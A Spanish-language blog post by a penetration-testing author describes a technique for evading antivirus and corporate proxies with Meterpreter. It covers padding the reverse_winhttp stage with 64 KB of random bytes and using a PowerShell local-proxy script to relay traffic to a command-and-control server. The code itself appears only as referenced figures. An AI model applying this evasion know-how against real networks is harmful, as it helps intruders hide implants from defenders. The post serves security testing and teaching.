Una de las vías que abre el mundo de la evasión es el siguiente: se trata de identificar payloads de Metepreter que disponen de la posibilidad de detectar servidores Proxy, utilizar credenciales de estos y disponer de la posibilidad de ‘encoder’. Anteriormente comenté reverse_winhttp, por lo que se puede hacer uno propio tomando como base éste u otros tipos que permitan las características anteriores. Quizá sea lo más inteligente, pero también lo más complejo.

Una idea "tonta"

El investigador Arno, propuso una técnica sencilla en el artículo de la Figura 2 y que vale para algunas configuraciones corporativas. Es una técnica que él mismo calificó de ‘tonta’, pero lo importante es ver que hay que probar diferentes ideas y ver cuáles pueden funcionar y cuáles no. Como se puede ver en ese artículo, lo importante es que los pequeños tricks que van saliendo día a día pueden ayudarte en tu Ethical Hacking.

Figura 5: Script con SecureRandom

Lo que hizo el investigador fue añadir un número aleatorio de bytes al comienzo del stage que es enviada de vuelta. Metiendo 64 KB al principio del stage conseguía engañar al antivirus, aunque esto siempre es un proceso prueba y error. Para hacer esto modificó el fichero meterpreter_loader.rb. Hay que tener en cuenta que hay que añadir una librería nativa de Ruby, la cual puede instalarse con ‘gem install rubysl-securerandom’.

Figura 6: Script con el código en PowerShell

Además, se modifica el código añadiendo, justo antes de meter la DLL, la variable randomData. Ahí se generan los 64KB aleatorios y luego se concatena el código de la DLL. Se publicó un ejemplo de script en Powershell para simplificar el proceso. Este script genera dos hilos. A continuación, se explica qué es lo que hace:
1. El hilo 1 inicia un Proxy HTTP que escucha en la interfaz de loopback en el puerto 8080. 
2. El hilo 2 carga y ejecuta en memoria un Meterpreter reverse_winhttp configurado para conectarse al Local Proxy. Es decir, la configuración es LHOST apuntando a 127.0.0.1 y LPORT apuntando al 8080. 
3. El Local Proxy del hilo 1, está configurado para conectarse al C&C, utilizando la configuración determinada del servicio Proxy y, si fuera necesario, utilizar autenticación NTLM. 
4. Cuando se ejecuta el stager de Meterpreter en el hilo 2, lo primero que se solicita es la DLL. 
5. Dicha solicitud pasará por el Local Proxy, el del hilo 1, el cual se encarga de transmitir la solicitud al C2, a través del proxy corporativo. Además, se encarga de eliminar los 64 KB de datos aleatorios. 
6. Desde este punto, toda comunicación entre el Meterpreter y el C2 pasa por el proxy local sin modificar.
A continuación, se puede ver el código dónde se invocan los dos hilos comentados anteriormente en el código.

Figura 7: Lanzamiento de ambos hilos en el código de Powershell

De nuevo comento que la técnica no es nueva y que es un trick válido para algunos escenarios corporativos. Lo importante es entender que este tipo de técnicas van saliendo y se van descubriendo, en muchos casos, con prueba y error el hecho de evadir un IDS o un IPS o algunas de las complejas soluciones de seguridad que existen en ciertas entidades. Puedes encontrar más cosas de evasión en el libro de Hacking con Metasploit.

Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advance Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”, Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDO de Telefónica.